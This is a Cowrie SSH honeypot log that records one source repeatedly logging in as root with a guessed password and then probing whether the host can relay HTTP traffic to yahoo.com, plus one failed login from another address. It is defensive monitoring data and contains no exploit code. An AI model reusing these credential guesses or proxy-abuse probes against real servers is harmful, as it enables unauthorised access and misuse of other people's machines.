{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:07:58.467446Z","src_ip":"213.209.150.239","session":"470b44325d5f"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:07:58.524821Z","src_ip":"213.209.150.239","session":"470b44325d5f"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":50405,"dst_ip":"1.2.3.4","dst_port":22,"session":"d98ac9d92115","protocol":"ssh","message":"New connection: 213.209.150.239:50405 (1.2.3.4:22) [session: d98ac9d92115]","sensor":"my-vps","timestamp":"2025-08-26T01:07:58.571335Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:07:58.572452Z","src_ip":"213.209.150.239","session":"d98ac9d92115"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:07:58.619998Z","src_ip":"213.209.150.239","session":"d98ac9d92115"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:07:58.855536Z","src_ip":"213.209.150.239","session":"d98ac9d92115"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"213.209.150.239","src_port":6167,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:6167","sensor":"my-vps","timestamp":"2025-08-26T01:07:58.903737Z","session":"d98ac9d92115"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:07:58.950999Z","src_ip":"213.209.150.239","session":"d98ac9d92115"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"213.209.150.239","src_port":7699,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:7699","sensor":"my-vps","timestamp":"2025-08-26T01:07:59.089667Z","session":"d98ac9d92115"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:07:59.137398Z","src_ip":"213.209.150.239","session":"d98ac9d92115"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:07:59.186405Z","src_ip":"213.209.150.239","session":"d98ac9d92115"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":50476,"dst_ip":"1.2.3.4","dst_port":22,"session":"3de8dd4f64e0","protocol":"ssh","message":"New connection: 213.209.150.239:50476 (1.2.3.4:22) [session: 3de8dd4f64e0]","sensor":"my-vps","timestamp":"2025-08-26T01:07:59.232368Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:07:59.233335Z","src_ip":"213.209.150.239","session":"3de8dd4f64e0"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:07:59.280241Z","src_ip":"213.209.150.239","session":"3de8dd4f64e0"}
{"eventid":"cowrie.login.failed","username":"safeuser","password":"safeuser","message":"login attempt [safeuser/safeuser] failed","sensor":"my-vps","timestamp":"2025-08-26T01:07:59.294712Z","src_ip":"27.112.78.170","session":"dca399acc033"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:07:59.514379Z","src_ip":"213.209.150.239","session":"3de8dd4f64e0"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"213.209.150.239","src_port":4807,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:4807","sensor":"my-vps","timestamp":"2025-08-26T01:07:59.562603Z","session":"3de8dd4f64e0"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:07:59.610713Z","src_ip":"213.209.150.239","session":"3de8dd4f64e0"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"213.209.150.239","src_port":22363,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:22363","sensor":"my-vps","timestamp":"2025-08-26T01:07:59.745424Z","session":"3de8dd4f64e0"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:07:59.792636Z","src_ip":"213.209.150.239","session":"3de8dd4f64e0"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:07:59.840405Z","src_ip":"213.209.150.239","session":"3de8dd4f64e0"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":50563,"dst_ip":"1.2.3.4","dst_port":22,"session":"dc1183f30784","protocol":"ssh","message":"New connection: 213.209.150.239:50563 (1.2.3.4:22) [session: dc1183f30784]","sensor":"my-vps","timestamp":"2025-08-26T01:07:59.886908Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:07:59.887839Z","src_ip":"213.209.150.239","session":"dc1183f30784"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:07:59.934905Z","src_ip":"213.209.150.239","session":"dc1183f30784"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:08:00.171437Z","src_ip":"213.209.150.239","session":"dc1183f30784"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"213.209.150.239","src_port":21874,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:21874","sensor":"my-vps","timestamp":"2025-08-26T01:08:00.219618Z","session":"dc1183f30784"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:08:00.267079Z","src_ip":"213.209.150.239","session":"dc1183f30784"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"213.209.150.239","src_port":23695,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:23695","sensor":"my-vps","timestamp":"2025-08-26T01:08:00.401536Z","session":"dc1183f30784"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:08:00.448720Z","src_ip":"213.209.150.239","session":"dc1183f30784"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:08:00.496660Z","src_ip":"213.209.150.239","session":"dc1183f30784"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":50620,"dst_ip":"1.2.3.4","dst_port":22,"session":"f43bd2b337c2","protocol":"ssh","message":"New connection: 213.209.150.239:50620 (1.2.3.4:22) [session: f43bd2b337c2]","sensor":"my-vps","timestamp":"2025-08-26T01:08:00.542977Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:08:00.543663Z","src_ip":"213.209.150.239","session":"f43bd2b337c2"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:08:00.563874Z","src_ip":"27.112.78.170","session":"dca399acc033"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:08:00.591391Z","src_ip":"213.209.150.239","session":"f43bd2b337c2"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:08:00.827138Z","src_ip":"213.209.150.239","session":"f43bd2b337c2"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"213.209.150.239","src_port":14270,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:14270","sensor":"my-vps","timestamp":"2025-08-26T01:08:00.875441Z","session":"f43bd2b337c2"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:08:00.923075Z","src_ip":"213.209.150.239","session":"f43bd2b337c2"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"213.209.150.239","src_port":9608,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:9608","sensor":"my-vps","timestamp":"2025-08-26T01:08:01.057846Z","session":"f43bd2b337c2"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:08:01.105203Z","src_ip":"213.209.150.239","session":"f43bd2b337c2"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:08:01.153994Z","src_ip":"213.209.150.239","session":"f43bd2b337c2"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":50677,"dst_ip":"1.2.3.4","dst_port":22,"session":"fcbfe6d9edc1","protocol":"ssh","message":"New connection: 213.209.150.239:50677 (1.2.3.4:22) [session: fcbfe6d9edc1]","sensor":"my-vps","timestamp":"2025-08-26T01:08:01.200025Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:08:01.200985Z","src_ip":"213.209.150.239","session":"fcbfe6d9edc1"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:08:01.248194Z","src_ip":"213.209.150.239","session":"fcbfe6d9edc1"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:08:01.483950Z","src_ip":"213.209.150.239","session":"fcbfe6d9edc1"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"213.209.150.239","src_port":27768,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:27768","sensor":"my-vps","timestamp":"2025-08-26T01:08:01.532366Z","session":"fcbfe6d9edc1"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:08:01.579761Z","src_ip":"213.209.150.239","session":"fcbfe6d9edc1"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"213.209.150.239","src_port":22704,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:22704","sensor":"my-vps","timestamp":"2025-08-26T01:08:01.717657Z","session":"fcbfe6d9edc1"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:08:01.764913Z","src_ip":"213.209.150.239","session":"fcbfe6d9edc1"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:08:01.812901Z","src_ip":"213.209.150.239","session":"fcbfe6d9edc1"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":50731,"dst_ip":"1.2.3.4","dst_port":22,"session":"84346f7c3ee3","protocol":"ssh","message":"New connection: 213.209.150.239:50731 (1.2.3.4:22) [session: 84346f7c3ee3]","sensor":"my-vps","timestamp":"2025-08-26T01:08:01.868722Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:08:01.869638Z","src_ip":"213.209.150.239","session":"84346f7c3ee3"}
